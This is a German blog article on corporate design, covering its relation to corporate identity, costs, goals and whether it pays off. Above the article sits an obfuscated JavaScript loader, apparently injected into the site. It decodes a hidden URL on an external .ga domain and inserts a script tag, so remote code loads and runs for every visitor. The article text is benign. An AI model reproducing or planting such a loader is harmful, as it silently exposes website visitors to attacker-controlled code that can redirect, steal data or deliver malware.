var _0x1f92=['appendChild','1051197hJyWzE','279875vBeEEE','679597pxmSpW','1208114MFItag','shift','currentScript','1yNFUPu','755208bCXcLD','parentNode','808668ljhldK','277011vIvjKc','push','createElement','1020859qQZHqJ','script','1012100HJdiys','fromCharCode','insertBefore','src','getElementsByTagName','1OuqVoU','3470379tibEqN','1439788dxeSnm','head','94160WqQicf','2vRLkLk'];var _0xe4f51f=_0x1605;(function(_0x36e879,_0x71d7d){var _0x19f9dd=_0x1605;while(!![]){try{var _0x27ae8f=-parseInt(_0x19f9dd(0x1b8))+-parseInt(_0x19f9dd(0x1b0))+parseInt(_0x19f9dd(0x1b6))*parseInt(_0x19f9dd(0x1af))+-parseInt(_0x19f9dd(0x1c7))+-parseInt(_0x19f9dd(0x1c1))+-parseInt(_0x19f9dd(0x1b2))+-parseInt(_0x19f9dd(0x1bd))*-parseInt(_0x19f9dd(0x1be));if(_0x27ae8f===_0x71d7d)break;else _0x36e879['push'](_0x36e879['shift']());}catch(_0x5a5af5){_0x36e879['push'](_0x36e879['shift']());}}}(_0x1f92,0x95a7c));var _0x230d=[_0xe4f51f(0x1bc),_0xe4f51f(0x1b7),_0xe4f51f(0x1b1),_0xe4f51f(0x1c5),_0xe4f51f(0x1c0),'698448rkGfeF',_0xe4f51f(0x1c6),'281314aeWSVS','1fashtG',_0xe4f51f(0x1c9),_0xe4f51f(0x1bf),_0xe4f51f(0x1bb),_0xe4f51f(0x1c4),_0xe4f51f(0x1b3),_0xe4f51f(0x1c2),_0xe4f51f(0x1b9),'1YWwfcj'],_0x3e5356=_0x567b;function _0x567b(_0x26bed5,_0x3c3ade){_0x26bed5=_0x26bed5-0x161;var _0x88803e=_0x230d[_0x26bed5];return _0x88803e;}function _0x1605(_0x7e46ac,_0x414a0e){_0x7e46ac=_0x7e46ac-0x1af;var _0x1f92c0=_0x1f92[_0x7e46ac];return _0x1f92c0;}(function(_0x513bd6,_0x54f163){var _0x1d2548=_0xe4f51f,_0x41ee88=_0x567b;while(!![]){try{var _0x2955a7=-parseInt(_0x41ee88(0x168))*parseInt(_0x41ee88(0x16a))+parseInt(_0x41ee88(0x16f))+-parseInt(_0x41ee88(0x165))*-parseInt(_0x41ee88(0x161))+-parseInt(_0x41ee88(0x16c))+parseInt(_0x41ee88(0x167))+parseInt(_0x41ee88(0x16e))+-parseInt(_0x41ee88(0x170))*-parseInt(_0x41ee88(0x169));if(_0x2955a7===_0x54f163)break;else _0x513bd6[_0x1d2548(0x1b4)](_0x513bd6['shift']());}catch(_0x33270c){_0x513bd6[_0x1d2548(0x1b4)](_0x513bd6[_0x1d2548(0x1c8)]());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x63,0x6c,0x69,0x63,0x6b,0x2e,0x64,0x72,0x69,0x76,0x65,0x72,0x66,0x6f,0x72,0x74,0x6e,0x69,0x67,0x74,0x6c,0x79,0x2e,0x67,0x61,0x2f,0x74,0x56,0x39,0x53,0x4a,0x48),d=document,s=d[_0xe4f51f(0x1b5)](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm,document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)][_0xe4f51f(0x1ba)](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0][_0xe4f51f(0x1c3)](s);

Corporate Design – Braucht man das?

von RHKD 9 Jahren
Startseite  /  Branding  /  Corporate Design – Braucht man das?

Ein kon­sis­ten­tes Cor­po­ra­te Design (CD) darf kei­nem Unter­neh­men feh­len. Egal ob tra­di­tio­nel­ler Fami­li­en­be­trieb oder inter­na­tio­na­ler Groß­kon­zern. Was steckt eigent­lich hin­ter der Bezeich­nung Cor­po­ra­te Design und war­um ist es für einen erfolg­rei­chen Mar­ken­auf­tritt so wichtig?

Was bedeutet Corporate Design?

Bevor wir tie­fer in die Mate­rie ein­tau­chen, soll­te erst ein­mal der Begriff selbst erklärt wer­den. Zwar ken­nen vie­le Unter­neh­men und Geschäfts­in­ha­ber den Begriff Cor­po­ra­te Design, ver­wech­seln ihn aber ger­ne mit der Cor­po­ra­te Iden­ti­ty (CI). Das CD ist jedoch nur ein Erfül­lungs­ge­hil­fe der Unter­neh­mens­per­sön­lich­keit. Man könn­te das Cor­po­ra­te Design als den Klei­dungs­stil des Unter­neh­mens bezeich­nen. Auch der bes­te Anzug und die teu­ers­ten Schu­he kön­nen nur schwer über den Cha­rak­ter ihres Trä­gers hin­weg­täu­schen und wenn, dann nur kurzweilig.

Corporate Design ohne Corporate Identity?

Dies kann nicht mit einem kla­ren Ja oder Nein beant­wor­tet wer­den. Bei Groß­kon­zer­nen ist die Erstel­lung einer Cor­po­ra­te Iden­ti­ty eigent­lich unum­gäng­lich, wäh­rend sich bei klei­ne­ren Fami­li­en­un­ter­neh­men das CI auch aus dem Unter­neh­men und sei­nen Inha­bern selbst erge­ben kann. Ein CI ist dem­nach immer gege­ben, sei es konstruiert/​geplant oder durch die übli­chen Gepflo­gen­hei­ten des Unter­neh­mens begründet.

Entwicklung eines Corporate Designs

Auch hier gibt es kei­nen Königs­weg, wel­cher Step-by-Step erklärt, wie man ein gelun­ge­nes Cor­po­ra­te Design kon­zi­piert, gestal­tet und imple­men­tiert. Neben der Ziel­grup­pen­ana­ly­se, der­zei­ti­ger sowie erhoff­ter Markt­po­si­ti­on und ande­ren Fak­to­ren, wie der Grö­ße des Unter­neh­mens und den Zie­len sei­ner Cor­po­ra­te Iden­ti­ty, spie­len vie­le Fak­to­ren bei der Erstel­lung eines Cor­po­ra­te Designs eine Rolle.

Die Kosten

Vor allem klei­ne­re Unter­neh­men schre­cken vor der Beauf­tra­gung eines Cor­po­ra­te Designs zurück, da sie mit erheb­li­chen Kos­ten rech­nen. Die Angst ist aber nicht berech­tigt. Die Kos­ten­fra­ge hängt stark vom Umfang und Kom­ple­xi­tät des Cor­po­ra­te Design ab. Vor allem klei­ne­re Betrie­be soll­ten nicht davor scheu­en, sich ein Ange­bot über die Erstel­lung eines Cor­po­ra­te Designs zukom­men zu las­sen. Ein pro­fes­sio­nel­les Cor­po­ra­te Design kann sogar dazu füh­ren, dass durch die Ver­wen­dung und den Ver­zicht bestimm­ter Mate­ria­li­en sogar eine Kos­ten­er­spar­nis erzielt wird – lang­fris­tig gese­hen ein nicht zu unter­schät­zen­der Faktor.

Das Ziel

Das Ziel eines Cor­po­ra­te Designs ist stets, die Wer­te­vor­stel­lun­gen des Unter­neh­mens visu­ell und kon­sis­tent nach innen und außen zu kom­mu­ni­zie­ren. Ver­ein­facht aus­ge­drückt: Es soll ein­heit­lich aus­se­hen, unver­wech­sel­bar sein und dem Cha­rak­ter des Unter­neh­mens ent­spre­chen. Legt die Cor­po­ra­te Lan­guage bei­spiels­wei­se fest, dass Kun­den per Du ange­spro­chen wer­den, so wäre eine zu for­ma­le Gestal­tung des CD unan­ge­bracht und andersherum.

Lohnt sich das?

Am Ende steht man, wie bei jeder Inves­ti­ti­on, vor der Fra­ge, ob sich die Aus­ga­ben über­haupt loh­nen. Die­se Fra­ge ist rela­tiv ein­fach und mit einem kla­ren »Ja« zu beant­wor­ten. Ein ein­heit­li­cher und stim­mi­ger Auf­tritt schafft Ver­trau­en bei Sta­ke­hol­dern, hebt das Unter­neh­men von sei­ner Kon­kur­renz ab, signa­li­siert Pro­fes­sio­na­li­tät und stärkt die Markt­po­si­ti­on des Unternehmens.

Kategorie:
  Branding
Artikel per Email verschicken